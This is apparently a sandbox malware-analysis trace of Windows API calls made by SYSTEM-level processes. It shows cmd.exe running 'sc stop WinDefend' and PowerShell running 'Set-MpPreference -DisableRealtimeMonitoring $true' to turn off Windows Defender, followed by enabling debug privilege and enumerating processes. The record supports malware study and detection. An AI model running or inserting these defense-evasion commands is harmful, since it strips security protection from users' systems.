	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0085.163] GetProcessHeap () returned 0x3d0000
	[0085.163] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3d0ef0 | out: hHeap=0x3d0000) returned 1
	[0085.163] GetProcessHeap () returned 0x3d0000
	[0085.163] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xa) returned 0x3dd520
	[0085.163] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0085.164] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x22f5e0*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="sc  stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f62c | out: lpCommandLine="sc  stop WinDefend", lpProcessInformation=0x22f62c*(hProcess=0x58, hThread=0x54, dwProcessId=0x8a0, dwThreadId=0x98c)) returned 1
	[0085.168] CloseHandle (hObject=0x54) returned 1
	[0085.168] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0085.168] GetProcessHeap () returned 0x3d0000
	[0085.168] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2f40 | out: hHeap=0x3d0000) returned 1
	[0085.168] GetEnvironmentStringsW () returned 0x3e01a8*
	[0085.168] GetProcessHeap () returned 0x3d0000
	[0085.168] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x8da) returned 0x3e2f40
	[0085.168] FreeEnvironmentStringsW (penv=0x3e01a8) returned 1
	[0085.168] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0
	[0085.297] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x22f520 | out: lpExitCode=0x22f520*=0x424) returned 1
	[0085.297] CloseHandle (hObject=0x58) returned 1
	[0085.297] _vsnwprintf (in: _Buffer=0x22f668, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f52c | out: _Buffer="00000424") returned 8
	[0085.297] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1
	[0085.297] GetProcessHeap () returned 0x3d0000
	[0085.298] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2f40 | out: hHeap=0x3d0000) returned 1
	[0085.298] GetEnvironmentStringsW () returned 0x3e20e8*
	[0085.298] GetProcessHeap () returned 0x3d0000
	[0085.298] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x900) returned 0x3e29f0
	[0085.298] FreeEnvironmentStringsW (penv=0x3e20e8) returned 1
	[0085.298] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0085.298] GetProcessHeap () returned 0x3d0000
	[0085.298] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e29f0 | out: hHeap=0x3d0000) returned 1
	[0085.298] GetEnvironmentStringsW () returned 0x3e20e8*
	[0085.298] GetProcessHeap () returned 0x3d0000
	[0085.298] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x900) returned 0x3e29f0
	[0085.298] FreeEnvironmentStringsW (penv=0x3e20e8) returned 1
	[0085.298] GetProcessHeap () returned 0x3d0000
	[0085.298] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3dd520 | out: hHeap=0x3d0000) returned 1
	[0085.298] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f584 | out: lpAttributeList=0x22f584) 
	[0085.298] _get_osfhandle (_FileHandle=1) returned 0x7
	[0085.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0085.298] _get_osfhandle (_FileHandle=1) returned 0x7
	[0085.298] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5a41ac | out: lpMode=0x4a5a41ac) returned 1
	[0085.298] _get_osfhandle (_FileHandle=0) returned 0x3
	[0085.298] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5a41b0 | out: lpMode=0x4a5a41b0) returned 1
	[0085.298] SetConsoleInputExeNameW () returned 0x1
	[0085.298] GetConsoleOutputCP () returned 0x1b5
	[0085.298] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0085.299] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0085.299] exit (_Code=1060) 

Process:
	id = "28"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7ee173c0"
	os_pid = "0x3ac"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "26"
	os_parent_pid = "0x22c"
	cmd_line = "powershell  Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 138
	os_tid = 0x78c

	[0086.403] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0086.541] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0086.541] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0086.541] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0086.541] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0087.020] GetVersionExW (in: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0087.020] GetLastError () returned 0x2
	[0087.021] GetVersionExW (in: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0087.021] GetLastError () returned 0x2
	[0087.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e7ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.025] GetLastError () returned 0x2
	[0087.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e7c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.029] GetLastError () returned 0x2
	[0087.029] GetVersionExW (in: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0087.029] GetLastError () returned 0x2
	[0087.030] SetErrorMode (uMode=0x1) returned 0x1
	[0087.031] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14ec48 | out: lpFileInformation=0x14ec48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0087.031] GetLastError () returned 0x2
	[0087.031] SetErrorMode (uMode=0x1) returned 0x1
	[0087.033] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14eccc | out: lpdwHandle=0x14eccc) returned 0x94c
	[0087.035] GetLastError () returned 0x0
	[0087.036] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x12d4d8c | out: lpData=0x12d4d8c) returned 1
	[0087.039] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ec98, puLen=0x14ec94 | out: lplpBuffer=0x14ec98*=0x12d4e28, puLen=0x14ec94) returned 1
	[0087.041] lstrlenW (lpString="䅁") returned 1
	[0087.046] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d4f04, puLen=0x14ec10) returned 1
	[0087.046] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0087.047] lstrcpyW (in: lpString1=0x361778, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0087.048] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d4f58, puLen=0x14ec10) returned 1
	[0087.048] lstrlenW (lpString="System.Management.Automation") returned 28
	[0087.048] lstrcpyW (in: lpString1=0x361778, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0087.048] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d4fb4, puLen=0x14ec10) returned 1
	[0087.048] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0087.048] lstrcpyW (in: lpString1=0x361778, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0087.048] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d4ff4, puLen=0x14ec10) returned 1
	[0087.048] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0087.048] lstrcpyW (in: lpString1=0x361778, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0087.048] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d505c, puLen=0x14ec10) returned 1
	[0087.048] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0087.048] lstrcpyW (in: lpString1=0x361778, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0087.048] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d50f8, puLen=0x14ec10) returned 1
	[0087.048] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0087.048] lstrcpyW (in: lpString1=0x361778, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0087.051] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d515c, puLen=0x14ec10) returned 1
	[0087.051] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0087.051] lstrcpyW (in: lpString1=0x361778, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0087.051] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d51d8, puLen=0x14ec10) returned 1
	[0087.051] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0087.051] lstrcpyW (in: lpString1=0x361778, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0087.051] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x12d4e80, puLen=0x14ec10) returned 1
	[0087.051] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0087.051] lstrcpyW (in: lpString1=0x361778, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0087.051] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x0, puLen=0x14ec10) returned 0
	[0087.051] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x0, puLen=0x14ec10) returned 0
	[0087.051] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14ec14, puLen=0x14ec10 | out: lplpBuffer=0x14ec14*=0x0, puLen=0x14ec10) returned 0
	[0087.051] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ec08, puLen=0x14ec04 | out: lplpBuffer=0x14ec08*=0x12d4e28, puLen=0x14ec04) returned 1
	[0087.052] VerLanguageNameW (in: wLang=0x0, szLang=0x361778, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0087.053] VerQueryValueW (in: pBlock=0x12d4d8c, lpSubBlock="\\", lplpBuffer=0x14ec1c, puLen=0x14ec18 | out: lplpBuffer=0x14ec1c*=0x12d4db4, puLen=0x14ec18) returned 1
	[0087.057] GetCurrentProcessId () returned 0x3ac
	[0087.063] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14e454 | out: lpLuid=0x14e454*(LowPart=0x14, HighPart=0)) returned 1
	[0087.064] GetLastError () returned 0x0
	[0087.065] GetCurrentProcess () returned 0xffffffff
	[0087.065] GetLastError () returned 0x0
	[0087.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x14e450 | out: TokenHandle=0x14e450*=0x284) returned 1
	[0087.066] GetLastError () returned 0x0
	[0087.068] AdjustTokenPrivileges (in: TokenHandle=0x284, DisableAllPrivileges=0, NewState=0x12d78cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0087.068] GetLastError () returned 0x0
	[0087.069] CloseHandle (hObject=0x284) returned 1
	[0087.069] GetLastError () returned 0x0
	[0087.072] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x284
	[0087.072] GetLastError () returned 0x0
	[0087.079] EnumProcessModules (in: hProcess=0x284, lphModule=0x12d7910, cb=0x100, lpcbNeeded=0x14ec44 | out: lphModule=0x12d7910, lpcbNeeded=0x14ec44) returned 1
	[0087.080] GetLastError () returned 0x0
	[0087.082] GetModuleInformation (in: hProcess=0x284, hModule=0x228c0000, lpmodinfo=0x12d7a50, cb=0xc | out: lpmodinfo=0x12d7a50*(lpBaseOfDll=0x228c0000, SizeOfImage=0x72000, EntryPoint=0x228c7363)) returned 1
	[0087.082] GetLastError () returned 0x0
	[0087.084] GetModuleBaseNameW (in: hProcess=0x284, hModule=0x228c0000, lpBaseName=0x367d10, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0087.084] GetLastError () returned 0x0
	[0087.085] GetModuleFileNameExW (in: hProcess=0x284, hModule=0x228c0000, lpFilename=0x367d10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0087.085] GetLastError () returned 0x0
	[0087.086] CloseHandle (hObject=0x284) returned 1
	[0087.086] GetLastError () returned 0x0
	[0087.086] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x3ac) returned 0x284
	[0087.086] GetLastError () returned 0x0
	[0087.088] GetExitCodeProcess (in: hProcess=0x284, lpExitCode=0x12d6f00 | out: lpExitCode=0x12d6f00*=0x103) returned 1
	[0087.088] GetLastError () returned 0x0
	[0087.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x22d5278, Length=0x20000, ResultLength=0x14ec8c | out: SystemInformation=0x22d5278, ResultLength=0x14ec8c*=0xa0a0) returned 0x0
	[0087.106] EnumWindows (lpEnumFunc=0x1103612, lParam=0x0) returned 1
	[0087.108] GetWindowThreadProcessId (in: hWnd=0x30036, lpdwProcessId=0x14e8e0 | out: lpdwProcessId=0x14e8e0) returned 0x130
	[0087.108] GetLastError () returned 0x0
	[0087.108] GetWindowThreadProcessId (in: hWnd=0x20038, lpdwProcessId=0x14e8e0 | out: lpdwProcessId=0x14e8e0) returned 0x264
	[0087.108] GetLastError () returned 0x0
	[0087.108] GetWindowThreadProcessId (in: hWnd=0x20034, lpdwProcessId=0x14e8e0 | out: lpdwProcessId=0x14e8e0) returned 0x6e4
	[0087.108] GetLastError () returned 0x0
	[0087.108] GetLastError () returned 0x0
	[0087.109] WerSetFlags () returned 0x0
	[0087.114] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0087.115] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14ecbc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14ecb8 | out: pulNumLanguages=0x14ecbc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14ecb8) returned 1
	[0087.116] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14ecbc, pwszLanguagesBuffer=0x12ec27c, pcchLanguagesBuffer=0x14ecb8 | out: pulNumLanguages=0x14ecbc, pwszLanguagesBuffer=0x12ec27c, pcchLanguagesBuffer=0x14ecb8) returned 1
	[0087.119] GetUserDefaultLocaleName (in: lpLocaleName=0x361778, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0087.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.137] GetLastError () returned 0xcb
	[0087.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.139] GetLastError () returned 0xcb
	[0087.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.140] GetLastError () returned 0xcb
	[0087.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.147] GetLastError () returned 0xcb
	[0087.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.147] GetLastError () returned 0xcb
	[0087.147] SetErrorMode (uMode=0x1) returned 0x1
	[0087.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14ebc8 | out: lpFileInformation=0x14ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0087.147] GetLastError () returned 0xcb
	[0087.147] SetErrorMode (uMode=0x1) returned 0x1
	[0087.147] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14ec4c | out: lpdwHandle=0x14ec4c) returned 0x94c
	[0087.149] GetLastError () returned 0x0
	[0087.149] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x12ee7ac | out: lpData=0x12ee7ac) returned 1
	[0087.150] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ec18, puLen=0x14ec14 | out: lplpBuffer=0x14ec18*=0x12ee848, puLen=0x14ec14) returned 1
	[0087.150] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12ee924, puLen=0x14eb90) returned 1
	[0087.150] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0087.150] lstrcpyW (in: lpString1=0x361778, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0087.150] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12ee978, puLen=0x14eb90) returned 1
	[0087.150] lstrlenW (lpString="System.Management.Automation") returned 28
	[0087.150] lstrcpyW (in: lpString1=0x361778, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0087.150] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12ee9d4, puLen=0x14eb90) returned 1
	[0087.150] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0087.150] lstrcpyW (in: lpString1=0x361778, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0087.150] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12eea14, puLen=0x14eb90) returned 1
	[0087.150] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0087.150] lstrcpyW (in: lpString1=0x361778, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12eea7c, puLen=0x14eb90) returned 1
	[0087.151] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0087.151] lstrcpyW (in: lpString1=0x361778, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12eeb18, puLen=0x14eb90) returned 1
	[0087.151] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0087.151] lstrcpyW (in: lpString1=0x361778, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
